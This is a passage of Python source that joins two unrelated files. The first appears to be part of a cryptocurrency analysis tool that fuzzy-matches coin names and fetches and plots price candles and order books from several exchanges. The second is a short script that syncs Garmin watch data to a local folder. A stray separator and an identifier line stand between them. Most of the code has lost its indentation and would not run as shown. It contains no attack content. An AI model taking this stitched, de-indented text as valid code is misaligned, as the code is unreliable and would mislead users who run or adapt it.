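    return symbol, currency, df_prices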
FIND_KEYS = ["id", "symbol", "name"]
# TODO: Find better algorithm then difflib.get_close_matches to find most similar coins
def find(source: str, coin: str, key: str, top: int, export: str) -> None:
"""Find similar coin by coin name,symbol or id.
    If you don't remember the exact name or id of the Coin at CoinGecko, CoinPaprika, Binance or Coinbase
you can use this command to display coins with similar name, symbol or id to your search query.
Example of usage: coin name is something like "polka". So I can try: find -c polka -k name -t 25
It will search for coin that has similar name to polka and display top 25 matches.
-c, --coin stands for coin - you provide here your search query
-k, --key it's a searching key. You can search by symbol, id or name of coin
-t, --top it displays top N number of records.
Parameters
----------
top: int
Number of records to display
coin: str
Cryptocurrency
key: str
Searching key (symbol, id, name)
source: str
Data source of coins. CoinGecko (cg) or CoinPaprika (cp) or Binance (bin), Coinbase (cb)
export : str
Export dataframe data to csv,json,xlsx file
"""
if source == "cg":
coins_df = get_coin_list()
coins_list = coins_df[key].to_list()
if key in ["symbol", "id"]:
coin = coin.lower()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
coins_df.drop("index", axis=1, inplace=True)
df = df.merge(coins_df, on=key)
elif source == "cp":
coins_df = get_list_of_coins()
coins_list = coins_df[key].to_list()
keys = {"name": "title", "symbol": "upper", "id": "lower"}
func_key = keys[key]
coin = getattr(coin, str(func_key))()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
df = df.merge(coins_df, on=key)
elif source == "bin":
# TODO: Fix it in future. Determine if user looks for symbol like ETH or ethereum
if len(coin) > 5:
key = "id"
coins_df_gecko = get_coin_list()
coins_df_bin = load_binance_map()
coins = pd.merge(
coins_df_bin, coins_df_gecko[["id", "name"]], how="left", on="id"
)
coins_list = coins[key].to_list()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
df = df.merge(coins, on=key)
elif source == "cb":
if len(coin) > 5:
key = "id"
coins_df_gecko = get_coin_list()
coins_df_bin = load_coinbase_map()
coins = pd.merge(
coins_df_bin, coins_df_gecko[["id", "name"]], how="left", on="id"
)
coins_list = coins[key].to_list()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
df = df.merge(coins, on=key)
else:
console.print(
"Couldn't execute find methods for CoinPaprika, Binance, Coinbase or CoinGecko\n"
)
df = pd.DataFrame()
print_rich_table(
df, headers=list(df.columns), show_index=False, title="Similar Coins"
)
console.print("")
export_data(
export,
os.path.dirname(os.path.abspath(__file__)),
"find",
df,
)
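# Usage sketch (illustrative only): searches CoinGecko for coins whose name is
# similar to "polka", matching the docstring example; export="" means no file
# is written.
def _example_find_polka() -> None:
    find(source="cg", coin="polka", key="name", top=10, export="")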
def display_all_coins(
source: str, coin: str, top: int, skip: int, show_all: bool, export: str
) -> None:
"""Find similar coin by coin name,symbol or id.
If you don't remember exact name or id of the Coin at CoinGecko, CoinPaprika, Coinbase, Binance
you can use this command to display coins with similar name, symbol or id to your search query.
Example of usage: coin name is something like "polka". So I can try: find -c polka -k name -t 25
It will search for coin that has similar name to polka and display top 25 matches.
-c, --coin stands for coin - you provide here your search query
-t, --top it displays top N number of records.
Parameters
----------
top: int
Number of records to display
coin: str
Cryptocurrency
source: str
Data source of coins. CoinGecko (cg) or CoinPaprika (cp) or Binance (bin), Coinbase (cb)
skip: int
Skip N number of records
show_all: bool
Flag to show all sources of data
export : str
Export dataframe data to csv,json,xlsx file
"""
sources = ["cg", "cp", "bin", "cb"]
limit, cutoff = 30, 0.75
coins_func_map = {
"cg": get_coin_list,
"cp": get_list_of_coins,
"bin": load_binance_map,
"cb": load_coinbase_map,
}
if show_all:
coins_func = coins_func_map.get(source)
if coins_func:
df = coins_func()
else:
df = prepare_all_coins_df()
elif not source or source not in sources:
df = prepare_all_coins_df()
cg_coins_list = df["CoinGecko"].to_list()
sim = difflib.get_close_matches(coin.lower(), cg_coins_list, limit, cutoff)
df_matched = pd.Series(sim).to_frame().reset_index()
df_matched.columns = ["index", "CoinGecko"]
df = df.merge(df_matched, on="CoinGecko")
df.drop("index", axis=1, inplace=True)
else:
if source == "cg":
coins_df = get_coin_list().drop("index", axis=1)
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "id", "name"]]
elif source == "cp":
coins_df = get_list_of_coins()
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "id", "name"]]
elif source == "bin":
coins_df_gecko = get_coin_list()
coins_df_bin = load_binance_map()
coins_df_bin.columns = ["symbol", "id"]
coins_df = pd.merge(
coins_df_bin, coins_df_gecko[["id", "name"]], how="left", on="id"
)
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "symbol", "name"]]
df.columns = ["index", "id", "name"]
elif source == "cb":
coins_df_gecko = get_coin_list()
coins_df_cb = load_coinbase_map()
coins_df_cb.columns = ["symbol", "id"]
coins_df = pd.merge(
coins_df_cb, coins_df_gecko[["id", "name"]], how="left", on="id"
)
df = _create_closest_match_df(coin.lower(), coins_df, limit, cutoff)
df = df[["index", "symbol", "name"]]
df.columns = ["index", "id", "name"]
else:
df = pd.DataFrame(columns=["index", "id", "symbol"])
console.print("Couldn't find any coins")
console.print("")
try:
df = df[skip : skip + top] # noqa
except Exception as e:
logger.exception(str(e))
console.print(e)
print_rich_table(
df.fillna("N/A"),
headers=list(df.columns),
show_index=False,
title="Similar Coins",
)
export_data(
export,
os.path.dirname(os.path.abspath(__file__)),
"coins",
df,
)
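# Usage sketch (illustrative only): lists CoinGecko coins similar to "polka"
# without exporting; the pagination values are arbitrary examples.
def _example_display_all_coins() -> None:
    display_all_coins(source="cg", coin="polka", top=15, skip=0, show_all=False, export="")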
def load_ta_data(
coin_map_df: pd.DataFrame, source: str, currency: str, **kwargs: Any
) -> Tuple[pd.DataFrame, str]:
"""Load data for Technical Analysis
Parameters
----------
coin_map_df: pd.DataFrame
Cryptocurrency
source: str
Source of data: CoinGecko, Binance, CoinPaprika
currency: str
Quotes currency
kwargs:
days: int
Days limit for coingecko, coinpaprika
limit: int
Limit for binance quotes
interval: str
Time interval for Binance
Returns
----------
Tuple[pd.DataFrame, str]
df with prices
quoted currency
"""
limit = kwargs.get("limit", 100)
interval = kwargs.get("interval", "1day")
days = kwargs.get("days", 30)
if source == "bin":
client = Client(cfg.API_BINANCE_KEY, cfg.API_BINANCE_SECRET)
interval_map = {
"1day": client.KLINE_INTERVAL_1DAY,
"3day": client.KLINE_INTERVAL_3DAY,
"1hour": client.KLINE_INTERVAL_1HOUR,
"2hour": client.KLINE_INTERVAL_2HOUR,
"4hour": client.KLINE_INTERVAL_4HOUR,
"6hour": client.KLINE_INTERVAL_6HOUR,
"8hour": client.KLINE_INTERVAL_8HOUR,
"12hour": client.KLINE_INTERVAL_12HOUR,
"1week": client.KLINE_INTERVAL_1WEEK,
"1min": client.KLINE_INTERVAL_1MINUTE,
"3min": client.KLINE_INTERVAL_3MINUTE,
"5min": client.KLINE_INTERVAL_5MINUTE,
"15min": client.KLINE_INTERVAL_15MINUTE,
"30min": client.KLINE_INTERVAL_30MINUTE,
"1month": client.KLINE_INTERVAL_1MONTH,
}
symbol_binance = coin_map_df["Binance"]
pair = symbol_binance + currency.upper()
if check_valid_binance_str(pair):
# console.print(f"{symbol_binance} loaded vs {currency.upper()}")
candles = client.get_klines(
symbol=pair,
interval=interval_map[interval],
limit=limit,
)
candles_df = pd.DataFrame(candles).astype(float).iloc[:, :6]
candles_df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df_coin = candles_df.set_index(
pd.to_datetime(candles_df["date"], unit="ms")
).drop("date", axis=1)
return df_coin, currency
return pd.DataFrame(), currency
if source == "cp":
symbol_coinpaprika = coin_map_df["CoinPaprika"]
df = coinpaprika_model.get_ohlc_historical(
symbol_coinpaprika, currency.upper(), days
)
if df.empty:
console.print("No data found", "\n")
return pd.DataFrame(), ""
df.drop(["time_close", "market_cap"], axis=1, inplace=True)
df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df = df.set_index(pd.to_datetime(df["date"])).drop("date", axis=1)
return df, currency
if source == "cg":
coin_id = coin_map_df["CoinGecko"]
# coin = pycoingecko_model.Coin(symbol_coingecko)
df = pycoingecko_model.get_coin_market_chart(coin_id, currency, days)
df = df["price"].resample("1D").ohlc().ffill()
df.columns = [
"Open",
"High",
"Low",
"Close",
]
df.index.name = "date"
return df, currency
if source == "cb":
symbol_coinbase = coin_map_df["Coinbase"]
coin, currency = symbol_coinbase.upper(), currency.upper()
pair = f"{coin}-{currency}"
if coinbase_model.check_validity_of_product(pair):
# console.print(f"{coin} loaded vs {currency}")
df = coinbase_model.get_candles(
product_id=pair,
interval=interval or "24hour",
).head(limit)
df_coin = df.set_index(pd.to_datetime(df["date"], unit="s")).drop(
"date", axis=1
)
return df_coin[::-1], currency
return pd.DataFrame(), currency
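# Usage sketch (illustrative only): picks one coin row from the merged map and
# fetches daily CoinPaprika candles for it with load_ta_data; the symbol is an
# example and a live API call is assumed.
def _example_load_ta(symbol: str = "btc") -> Tuple[pd.DataFrame, str]:
    coin_map_df = prepare_all_coins_df().set_index("Symbol").loc[symbol]
    # if several rows match the symbol, the first one could be taken with .iloc[0]
    return load_ta_data(coin_map_df, source="cp", currency="usd", days=90)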
def plot_chart(
coin_map_df: pd.DataFrame, source: str, currency: str, **kwargs: Any
) -> None:
"""Load data for Technical Analysis
Parameters
----------
coin_map_df: pd.DataFrame
Cryptocurrency
source: str
Source of data: CoinGecko, Binance, CoinPaprika
currency: str
Quotes currency
kwargs:
days: int
Days limit for coingecko, coinpaprika
limit: int
Limit for binance quotes
interval: str
Time interval for Binance
"""
limit = kwargs.get("limit", 100)
interval = kwargs.get("interval", "1day")
days = kwargs.get("days", 30)
if source == "bin":
client = Client(cfg.API_BINANCE_KEY, cfg.API_BINANCE_SECRET)
interval_map = {
"1day": client.KLINE_INTERVAL_1DAY,
"3day": client.KLINE_INTERVAL_3DAY,
"1hour": client.KLINE_INTERVAL_1HOUR,
"2hour": client.KLINE_INTERVAL_2HOUR,
"4hour": client.KLINE_INTERVAL_4HOUR,
"6hour": client.KLINE_INTERVAL_6HOUR,
"8hour": client.KLINE_INTERVAL_8HOUR,
"12hour": client.KLINE_INTERVAL_12HOUR,
"1week": client.KLINE_INTERVAL_1WEEK,
"1min": client.KLINE_INTERVAL_1MINUTE,
"3min": client.KLINE_INTERVAL_3MINUTE,
"5min": client.KLINE_INTERVAL_5MINUTE,
"15min": client.KLINE_INTERVAL_15MINUTE,
"30min": client.KLINE_INTERVAL_30MINUTE,
"1month": client.KLINE_INTERVAL_1MONTH,
}
symbol_binance = coin_map_df["Binance"]
pair = symbol_binance + currency
if check_valid_binance_str(pair):
# console.print(f"{symbol_binance} loaded vs {currency.upper()}")
candles = client.get_klines(
symbol=pair,
interval=interval_map[interval],
limit=limit,
)
candles_df = pd.DataFrame(candles).astype(float).iloc[:, :6]
candles_df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df_coin = candles_df.set_index(
pd.to_datetime(candles_df["date"], unit="ms")
).drop("date", axis=1)
title = f"{symbol_binance + currency} from {df_coin.index[0].strftime('%Y/%m/%d')} to {df_coin.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
plot_candles(
candles_df=df_coin,
title=title,
volume=True,
)
if source == "cp":
symbol_coinpaprika = coin_map_df["CoinPaprika"]
df = coinpaprika_model.get_ohlc_historical(
str(symbol_coinpaprika), currency.upper(), days
)
if df.empty:
console.print("There is not data to plot chart\n")
return
df.drop(["time_close", "market_cap"], axis=1, inplace=True)
df.columns = [
"date",
"Open",
"High",
"Low",
"Close",
"Volume",
]
df = df.set_index(pd.to_datetime(df["date"])).drop("date", axis=1)
title = f"{symbol_coinpaprika}/{currency} from {df.index[0].strftime('%Y/%m/%d')} to {df.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
df["Volume"] = df["Volume"] / 1_000_000
plot_candles(
candles_df=df,
title=title,
volume=True,
ylabel="Volume [1M]",
)
console.print("")
if source == "cg":
symbol_coingecko = coin_map_df["CoinGecko"]
coin = pycoingecko_model.Coin(symbol_coingecko)
df = coin.get_coin_market_chart(currency, days)
df = df["price"].resample("1D").ohlc().ffill()
df.columns = [
"Open",
"High",
"Low",
"Close",
]
title = f"{symbol_coingecko}/{currency} from {df.index[0].strftime('%Y/%m/%d')} to {df.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
plot_candles(
candles_df=df,
title=title,
volume=False,
ylabel="Volume [1M]",
)
console.print("")
if source == "cb":
symbol_coinbase = coin_map_df["Coinbase"]
coin, currency = symbol_coinbase.upper(), currency.upper()
pair = f"{coin}-{currency}"
if coinbase_model.check_validity_of_product(pair):
df = coinbase_model.get_candles(
product_id=pair,
interval=interval or "24hour",
).head(limit)
df = df.astype(float).iloc[:, :6]
df.sort_values(by="date", inplace=True, ascending=True)
df = df.set_index(pd.to_datetime(df["date"], unit="s")).drop("date", axis=1)
title = f"{coin}/{currency} from {df.index[0].strftime('%Y/%m/%d')} to {df.index[-1].strftime('%Y/%m/%d')}" # noqa: E501
df["Volume"] = df["Volume"] / 1_000
plot_candles(
candles_df=df,
title=title,
volume=True,
ylabel="Volume [1K]",
)
console.print("")
def plot_candles(
candles_df: pd.DataFrame,
volume: bool,
ylabel: str = "",
title: str = "",
external_axes: Optional[List[plt.Axes]] = None,
) -> None:
"""Plot candle chart from dataframe. [Source: Binance]
Parameters
----------
    candles_df: pd.DataFrame
        Dataframe containing time and OHLCV
    volume: bool
        Whether to draw a volume subplot
    ylabel: str
        Label for the lower (volume) axis
    title: str
        Title of the graph
    external_axes : Optional[List[plt.Axes]], optional
        External axes (1 axis, or 2 axes when volume is True), by default None
"""
candle_chart_kwargs = {
"type": "candle",
"style": theme.mpf_style,
"volume": volume,
"xrotation": theme.xticks_rotation,
"ylabel_lower": ylabel,
"scale_padding": {"left": 0.3, "right": 1, "top": 0.8, "bottom": 0.8},
"update_width_config": {
"candle_linewidth": 0.6,
"candle_width": 0.8,
"volume_linewidth": 0.8,
"volume_width": 0.8,
},
"warn_too_much_data": 10000,
}
# This plot has 2 axes
if not external_axes:
candle_chart_kwargs["returnfig"] = True
candle_chart_kwargs["figratio"] = (10, 7)
candle_chart_kwargs["figscale"] = 1.10
candle_chart_kwargs["figsize"] = plot_autoscale()
fig, _ = mpf.plot(candles_df, **candle_chart_kwargs)
fig.suptitle(
f"\n{title}",
horizontalalignment="left",
verticalalignment="top",
x=0.05,
y=1,
)
theme.visualize_output(force_tight_layout=False)
else:
nr_external_axes = 2 if volume else 1
if len(external_axes) != nr_external_axes:
logger.error("Expected list of %s axis items.", str(nr_external_axes))
console.print(
f"[red]Expected list of {nr_external_axes} axis items./n[/red]"
)
return
if volume:
(ax, volume) = external_axes
candle_chart_kwargs["volume"] = volume
else:
            (ax,) = external_axes
candle_chart_kwargs["ax"] = ax
mpf.plot(candles_df, **candle_chart_kwargs)
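# Usage sketch (fully self-contained): builds a tiny synthetic OHLCV frame and
# renders it with plot_candles; the numbers are made up purely to show the
# expected DatetimeIndex and column layout.
def _example_plot_candles() -> None:
    idx = pd.date_range("2021-01-01", periods=5, freq="D")
    demo = pd.DataFrame(
        {
            "Open": [1.0, 1.1, 1.2, 1.15, 1.3],
            "High": [1.2, 1.3, 1.35, 1.3, 1.4],
            "Low": [0.9, 1.0, 1.1, 1.05, 1.2],
            "Close": [1.1, 1.2, 1.15, 1.3, 1.35],
            "Volume": [10.0, 12.0, 9.0, 11.0, 13.0],
        },
        index=idx,
    )
    plot_candles(candles_df=demo, volume=True, title="Synthetic example")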
def plot_order_book(
bids: np.ndarray,
asks: np.ndarray,
coin: str,
external_axes: Optional[List[plt.Axes]] = None,
) -> None:
"""
Plots Bid/Ask. Can be used for Coinbase and Binance
Parameters
----------
bids : np.array
array of bids with columns: price, size, cumulative size
asks : np.array
array of asks with columns: price, size, cumulative size
coin : str
Coin being plotted
external_axes : Optional[List[plt.Axes]], optional
External axes (1 axis is expected in the list), by default None
"""
# This plot has 1 axis
if external_axes is None:
_, ax = plt.subplots(figsize=plot_autoscale(), dpi=PLOT_DPI)
else:
if len(external_axes) != 1:
logger.error("Expected list of one axis item.")
console.print("[red]Expected list of one axis item./n[/red]")
return
(ax,) = external_axes
ax.plot(bids[:, 0], bids[:, 2], color=theme.up_color, label="bids")
ax.fill_between(bids[:, 0], bids[:, 2], color=theme.up_color, alpha=0.4)
ax.plot(asks[:, 0], asks[:, 2], color=theme.down_color, label="asks")
ax.fill_between(asks[:, 0], asks[:, 2], color=theme.down_color, alpha=0.4)
ax.legend()
ax.set_xlabel("Price")
ax.set_ylabel("Size (Coins)")
ax.set_title(f"Order Book for {coin}")
theme.style_primary_axis(ax)
if external_axes is None:
theme.visualize_output(force_tight_layout=False)
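# Usage sketch (fully self-contained): plots a small synthetic order book; the
# columns follow the documented layout of price, size, cumulative size.
def _example_plot_order_book() -> None:
    bids = np.array([[99.0, 1.0, 1.0], [98.0, 2.0, 3.0], [97.0, 1.5, 4.5]])
    asks = np.array([[101.0, 1.0, 1.0], [102.0, 2.0, 3.0], [103.0, 0.5, 3.5]])
    plot_order_book(bids, asks, coin="DEMO")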
|
the-stack_106_19156
|
from dirsync import sync
from os import system
import configparser
import pyudev
import psutil
#configuration file
config = configparser.ConfigParser()
config.read('config.ini')
class synchronise:
def local_(garmin, back_folder_name): #Include Garmin watch mount point, back-up folder location
sync(garmin+"/GARMIN", back_folder_name, 'sync', purge = False, create=True)
#os.system("find . -type d | cpio -pdvm ../converted/")
def cloud_(garmin):
print("This is the cloud sync function")
print(garmin)
def rasp_(self):
print("This is the raspberyy sync function")
class mountpoint:
def mount_point(device_node):
for partitions in psutil.disk_partitions():
if partitions.device == device_node:
return partitions.mountpoint
    def get(): # scan block devices for the configured Garmin label
context = pyudev.Context()
for device in context.list_devices(subsystem='block'):
if device.get('ID_FS_LABEL') == config['credential']['ID_FS_LABEL']:
return mountpoint.mount_point(device.device_node)
if __name__ == "__main__":
if mountpoint.get() == None:
pass
else:
synchronise.local_(mountpoint.get(), "../data/raw")
|